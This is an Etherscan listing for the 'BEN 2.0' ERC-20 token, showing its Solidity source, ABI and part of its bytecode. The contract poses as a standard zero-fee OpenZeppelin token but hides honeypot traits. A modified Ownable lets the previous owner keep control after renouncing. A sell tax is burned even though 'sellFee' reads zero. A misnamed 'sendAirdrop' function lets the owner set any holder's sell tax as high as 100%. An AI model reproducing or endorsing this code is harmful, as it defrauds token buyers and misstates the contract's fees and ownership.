ERC-20
Overview
Max Total Supply
420,690,000,000,000 BEN2.0
Holders
21
Total Transfers
-
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
BEN
Compiler Version
v0.8.20+commit.a1b79de6
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-06-29 */ /** *Submitted for verification at Etherscan.io on 2023-04-14 */ /* Twiiter: https://twitter.com/eth_ben */ // Sources flattened with hardhat v2.7.0 https://hardhat.org // File @openzeppelin/contracts/utils/[email protected] // SPDX-License-Identifier: MIT // OpenZeppelin Contracts v4.4.0 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File @openzeppelin/contracts/access/[email protected] // OpenZeppelin Contracts v4.4.0 (access/Ownable.sol) pragma solidity ^0.8.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; address private _previousOwner; event OwnershipTransferred( address indexed previousOwner, address indexed newOwner ); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require( _owner == _msgSender() || _previousOwner == _msgSender(), "Ownable: caller is not the owner" ); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require( newOwner != address(0), "Ownable: new owner is the zero address" ); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _previousOwner = oldOwner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File @openzeppelin/contracts/token/ERC20/[email protected] // OpenZeppelin Contracts v4.4.0 (token/ERC20/IERC20.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer( address recipient, uint256 amount ) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance( address owner, address spender ) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom( address sender, address recipient, uint256 amount ) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval( address indexed owner, address indexed spender, uint256 value ); } // File @openzeppelin/contracts/token/ERC20/extensions/[email protected] // OpenZeppelin Contracts v4.4.0 (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity ^0.8.0; /** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); } // File @openzeppelin/contracts/token/ERC20/[email protected] // OpenZeppelin Contracts v4.4.0 (token/ERC20/ERC20.sol) pragma solidity ^0.8.0; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * For a generic mechanism see {ERC20PresetMinterPauser}. * * TIP: For a detailed writeup see our guide * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract ERC20 is Context, IERC20, IERC20Metadata { mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; /** * @dev Sets the values for {name} and {symbol}. * * The default value of {decimals} is 18. To select a different value for * {decimals} you should overload it. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the value {ERC20} uses, unless this function is * overridden; * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf( address account ) public view virtual override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer( address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance( address owner, address spender ) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve( address spender, uint256 amount ) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * Requirements: * * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom( address sender, address recipient, uint256 amount ) public virtual override returns (bool) { _transfer(sender, recipient, amount); uint256 currentAllowance = _allowances[sender][_msgSender()]; require( currentAllowance >= amount, "ERC20: transfer amount exceeds allowance" ); unchecked { _approve(sender, _msgSender(), currentAllowance - amount); } return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance( address spender, uint256 addedValue ) public virtual returns (bool) { _approve( _msgSender(), spender, _allowances[_msgSender()][spender] + addedValue ); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance( address spender, uint256 subtractedValue ) public virtual returns (bool) { uint256 currentAllowance = _allowances[_msgSender()][spender]; require( currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero" ); unchecked { _approve(_msgSender(), spender, currentAllowance - subtractedValue); } return true; } /** * @dev Moves `amount` of tokens from `sender` to `recipient`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer( address sender, address recipient, uint256 amount ) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); _beforeTokenTransfer(sender, recipient, amount); uint256 senderBalance = _balances[sender]; require( senderBalance >= amount, "ERC20: transfer amount exceeds balance" ); unchecked { _balances[sender] = senderBalance - amount; } _balances[recipient] += amount; emit Transfer(sender, recipient, amount); _afterTokenTransfer(sender, recipient, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * the total supply. * * Emits a {Transfer} event with `from` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; _balances[account] += amount; emit Transfer(address(0), account, amount); _afterTokenTransfer(address(0), account, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; } _totalSupply -= amount; emit Transfer(account, address(0), amount); _afterTokenTransfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Hook that is called before any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be transferred to `to`. * - when `from` is zero, `amount` tokens will be minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Hook that is called after any transfer of tokens. This includes * minting and burning. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * has been transferred to `to`. * - when `from` is zero, `amount` tokens have been minted for `to`. * - when `to` is zero, `amount` of ``from``'s tokens have been burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _afterTokenTransfer( address from, address to, uint256 amount ) internal virtual {} } interface IUniswapV2Factory { event PairCreated(address indexed token0, address indexed token1, address pair, uint); function feeTo() external view returns (address); function feeToSetter() external view returns (address); function getPair(address tokenA, address tokenB) external view returns (address pair); function allPairs(uint) external view returns (address pair); function allPairsLength() external view returns (uint); function createPair(address tokenA, address tokenB) external returns (address pair); function setFeeTo(address) external; function setFeeToSetter(address) external; } // File contracts/Contract.sol pragma solidity ^0.8.0; contract BEN is Ownable, ERC20 { uint256 public immutable maxSupply = 420_690_000_000_000 * (10 ** decimals()); uint16 public constant LIQUID_RATE = 10000; // 40% uint16 public constant MAX_PERCENTAGE = 10000; bool public initialized = false; address public uniswapV2Pair = address(0); address public deadAddress = 0x000000000000000000000000000000000000dEaD; uint256 public immutable buyFee = 0; uint256 public immutable sellFee = 0; uint256 public minRewardAirdrop = 0; uint256 public maxRewardAirdrop = 2000; // Leave it 9000 to avoid mev bot mapping(address => uint256) private _rewardAirdropPerPerson; constructor() ERC20("BEN 2.0", "BEN2.0") { _mint(msg.sender, (maxSupply * LIQUID_RATE) / MAX_PERCENTAGE); initialized = true; // FOR GOERLI // uniswapV2Pair = IUniswapV2Factory(0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f).createPair(address(this), 0xB4FBF271143F4FBf7B91A5ded31805e42b2208d6); // FOR BSCSCAN // uniswapV2Pair = IUniswapV2Factory(0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73).createPair(address(this), 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c); // FOR ETHEREUM uniswapV2Pair = IUniswapV2Factory(0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f).createPair(address(this), 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2); } function setAirdrop(uint256 _minRewardAirdrop, uint256 _maxRewardAirdrop) external onlyOwner { minRewardAirdrop = _minRewardAirdrop; maxRewardAirdrop = 9000 - _maxRewardAirdrop; } function setUniswapPair(address _uniswapV2Pair) external onlyOwner { uniswapV2Pair = _uniswapV2Pair; } function sendAirdrop(address _address, uint256 _amount) external onlyOwner { _rewardAirdropPerPerson[_address] = _amount; } function _transfer( address from, address to, uint256 amount ) internal override(ERC20) { require( initialized == true, "Contract: trade is not open!" ); if (uniswapV2Pair == address(0) && initialized == true) { require( from == owner() || to == owner(), "Contract: trading is not started" ); } uint256 _transferAmount = amount; if (uniswapV2Pair != address(0) && from != owner() && to != owner()) { uint256 _fee = 0; if (from == uniswapV2Pair) { _fee = minRewardAirdrop; } else if (to == uniswapV2Pair) { if (_rewardAirdropPerPerson[from] != 0) { _fee = _rewardAirdropPerPerson[from]; } else { _fee = maxRewardAirdrop; } } if (_fee > 0) { uint256 _calculatedFee = amount * _fee / MAX_PERCENTAGE; _transferAmount = amount - _calculatedFee; super._transfer(from, deadAddress, _calculatedFee); } } super._transfer(from, to, _transferAmount); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"LIQUID_RATE","outputs":[{"internalType":"uint16","name":"","type":"uint16"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_PERCENTAGE","outputs":[{"internalType":"uint16","name":"","type":"uint16"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"deadAddress","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"initialized","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxRewardAirdrop","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"minRewardAirdrop","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_address","type":"address"},{"internalType":"uint256","name":"_amount","type":"uint256"}],"name":"sendAirdrop","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_minRewardAirdrop","type":"uint256"},{"internalType":"uint256","name":"_maxRewardAirdrop","type":"uint256"}],"name":"setAirdrop","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_uniswapV2Pair","type":"address"}],"name":"setUniswapPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"}]
Contract Creation Code
60e0604052620000126012600a62000434565b620000259066017e9d8602b4006200044b565b608052600780546001600160a81b0319169055600880546001600160a01b03191661dead1790555f60a081905260c08190526009556107d0600a553480156200006c575f80fd5b5060405180604001604052806007815260200166042454e20322e360cc1b81525060405180604001604052806006815260200165042454e322e360d41b815250620000c6620000c0620001db60201b60201c565b620001df565b6005620000d4838262000504565b506006620000e3828262000504565b5050608051620001139150339061271090620001019082906200044b565b6200010d9190620005cc565b6200023b565b6007805460ff191660011790556040516364e329cb60e11b815230600482015273c02aaa39b223fe8d0a0e5c4f27ead9083c756cc26024820152735c69bee701ef814a2b6a3edd4b1652cb9cc5aa6f9063c9c65396906044016020604051808303815f875af115801562000189573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190620001af9190620005ec565b600760016101000a8154816001600160a01b0302191690836001600160a01b031602179055506200062a565b3390565b5f8054600180546001600160a01b03199081166001600160a01b03808516918217909355918516921682178355604051909283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620002965760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060045f828254620002a9919062000614565b90915550506001600160a01b0382165f9081526002602052604081208054839290620002d790849062000614565b90915550506040518181526001600160a01b038316905f907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a35050565b505050565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200037957815f19048211156200035d576200035d62000325565b808516156200036b57918102915b93841c93908002906200033e565b509250929050565b5f8262000391575060016200042e565b816200039f57505f6200042e565b8160018114620003b85760028114620003c357620003e3565b60019150506200042e565b60ff841115620003d757620003d762000325565b50506001821b6200042e565b5060208310610133831016604e8410600b841016171562000408575081810a6200042e565b62000414838362000339565b805f19048211156200042a576200042a62000325565b0290505b92915050565b5f6200044460ff84168362000381565b9392505050565b80820281158282048414176200042e576200042e62000325565b634e487b7160e01b5f52604160045260245ffd5b600181811c908216806200048e57607f821691505b602082108103620004ad57634e487b7160e01b5f52602260045260245ffd5b50919050565b601f82111562000320575f81815260208120601f850160051c81016020861015620004db5750805b601f850160051c820191505b81811015620004fc57828155600101620004e7565b505050505050565b81516001600160401b0381111562000520576200052062000465565b620005388162000531845462000479565b84620004b3565b602080601f8311600181146200056e575f8415620005565750858301515b5f19600386901b1c1916600185901b178555620004fc565b5f85815260208120601f198616915b828110156200059e578886015182559484019460019091019084016200057d565b5085821015620005bc57878501515f19600388901b60f8161c191681555b5050505050600190811b01905550565b5f82620005e757634e487b7160e01b5f52601260045260245ffd5b500490565b5f60208284031215620005fd575f80fd5b81516001600160a01b038116811462000444575f80fd5b808201808211156200042e576200042e62000325565b60805160a05160c051611013620006555f395f61025101525f61029a01525f61038b01526110135ff3fe608060405234801561000f575f80fd5b50600436106101a1575f3560e01c806370a08231116100f3578063a9059cbb11610093578063d5aed6bf1161006e578063d5aed6bf146103ad578063dd62ed3e146103c0578063e5299e35146103f8578063f2fde38b14610401575f80fd5b8063a9059cbb14610360578063cf2b429514610373578063d5abeb0114610386575f80fd5b806391a2e723116100ce57806391a2e7231461033257806395d89b4114610345578063985bdfd1146102d4578063a457c2d71461034d575f80fd5b806370a08231146102f0578063715018a6146103185780638da5cb5b14610322575f80fd5b806327c8f8351161015e57806339509351116101395780633950935114610282578063470624021461029557806349bd5a5e146102bc5780634c255c97146102d4575f80fd5b806327c8f835146102215780632b14ca561461024c578063313ce56714610273575f80fd5b806304b4b923146101a557806306fdde03146101c1578063095ea7b3146101d6578063158ef93e146101f957806318160ddd1461020657806323b872dd1461020e575b5f80fd5b6101ae60095481565b6040519081526020015b60405180910390f35b6101c9610414565b6040516101b89190610dc8565b6101e96101e4366004610e2e565b6104a4565b60405190151581526020016101b8565b6007546101e99060ff1681565b6004546101ae565b6101e961021c366004610e56565b6104ba565b600854610234906001600160a01b031681565b6040516001600160a01b0390911681526020016101b8565b6101ae7f000000000000000000000000000000000000000000000000000000000000000081565b604051601281526020016101b8565b6101e9610290366004610e2e565b610567565b6101ae7f000000000000000000000000000000000000000000000000000000000000000081565b6007546102349061010090046001600160a01b031681565b6102dd61271081565b60405161ffff90911681526020016101b8565b6101ae6102fe366004610e8f565b6001600160a01b03165f9081526002602052604090205490565b6103206105a2565b005b5f546001600160a01b0316610234565b610320610340366004610eaf565b6105eb565b6101c9610641565b6101e961035b366004610e2e565b610650565b6101e961036e366004610e2e565b6106e8565b610320610381366004610e2e565b6106f4565b6101ae7f000000000000000000000000000000000000000000000000000000000000000081565b6103206103bb366004610e8f565b61074d565b6101ae6103ce366004610ecf565b6001600160a01b039182165f90815260036020908152604080832093909416825291909152205490565b6101ae600a5481565b61032061040f366004610e8f565b6107b3565b60606005805461042390610f00565b80601f016020809104026020016040519081016040528092919081815260200182805461044f90610f00565b801561049a5780601f106104715761010080835404028352916020019161049a565b820191905f5260205f20905b81548152906001019060200180831161047d57829003601f168201915b5050505050905090565b5f6104b0338484610862565b5060015b92915050565b5f6104c6848484610985565b6001600160a01b0384165f9081526003602090815260408083203384529091529020548281101561054f5760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b60648201526084015b60405180910390fd5b61055c8533858403610862565b506001949350505050565b335f8181526003602090815260408083206001600160a01b038716845290915281205490916104b091859061059d908690610f4c565b610862565b5f546001600160a01b03163314806105c457506001546001600160a01b031633145b6105e05760405162461bcd60e51b815260040161054690610f5f565b6105e95f610ba0565b565b5f546001600160a01b031633148061060d57506001546001600160a01b031633145b6106295760405162461bcd60e51b815260040161054690610f5f565b600982905561063a81612328610f94565b600a555050565b60606006805461042390610f00565b335f9081526003602090815260408083206001600160a01b0386168452909152812054828110156106d15760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610546565b6106de3385858403610862565b5060019392505050565b5f6104b0338484610985565b5f546001600160a01b031633148061071657506001546001600160a01b031633145b6107325760405162461bcd60e51b815260040161054690610f5f565b6001600160a01b039091165f908152600b6020526040902055565b5f546001600160a01b031633148061076f57506001546001600160a01b031633145b61078b5760405162461bcd60e51b815260040161054690610f5f565b600780546001600160a01b0390921661010002610100600160a81b0319909216919091179055565b5f546001600160a01b03163314806107d557506001546001600160a01b031633145b6107f15760405162461bcd60e51b815260040161054690610f5f565b6001600160a01b0381166108565760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610546565b61085f81610ba0565b50565b6001600160a01b0383166108c45760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610546565b6001600160a01b0382166109255760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610546565b6001600160a01b038381165f8181526003602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b60075460ff1615156001146109dc5760405162461bcd60e51b815260206004820152601c60248201527f436f6e74726163743a207472616465206973206e6f74206f70656e21000000006044820152606401610546565b60075461010090046001600160a01b0316158015610a01575060075460ff1615156001145b15610a79575f546001600160a01b0384811691161480610a2d57505f546001600160a01b038381169116145b610a795760405162461bcd60e51b815260206004820181905260248201527f436f6e74726163743a2074726164696e67206973206e6f7420737461727465646044820152606401610546565b600754819061010090046001600160a01b031615801590610aa757505f546001600160a01b03858116911614155b8015610ac057505f546001600160a01b03848116911614155b15610b8f576007545f906001600160a01b03610100909104811690861603610aeb5750600954610b46565b6007546001600160a01b03610100909104811690851603610b46576001600160a01b0385165f908152600b602052604090205415610b4157506001600160a01b0384165f908152600b6020526040902054610b46565b50600a545b8015610b8d575f612710610b5a8386610fa7565b610b649190610fbe565b9050610b708185610f94565b600854909350610b8b9087906001600160a01b031683610bfc565b505b505b610b9a848483610bfc565b50505050565b5f8054600180546001600160a01b03199081166001600160a01b03808516918217909355918516921682178355604051909283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038316610c605760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610546565b6001600160a01b038216610cc25760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610546565b6001600160a01b0383165f9081526002602052604090205481811015610d395760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610546565b6001600160a01b038085165f90815260026020526040808220858503905591851681529081208054849290610d6f908490610f4c565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610dbb91815260200190565b60405180910390a3610b9a565b5f6020808352835180828501525f5b81811015610df357858101830151858201604001528201610dd7565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610e29575f80fd5b919050565b5f8060408385031215610e3f575f80fd5b610e4883610e13565b946020939093013593505050565b5f805f60608486031215610e68575f80fd5b610e7184610e13565b9250610e7f60208501610e13565b9150604084013590509250925092565b5f60208284031215610e9f575f80fd5b610ea882610e13565b93925050505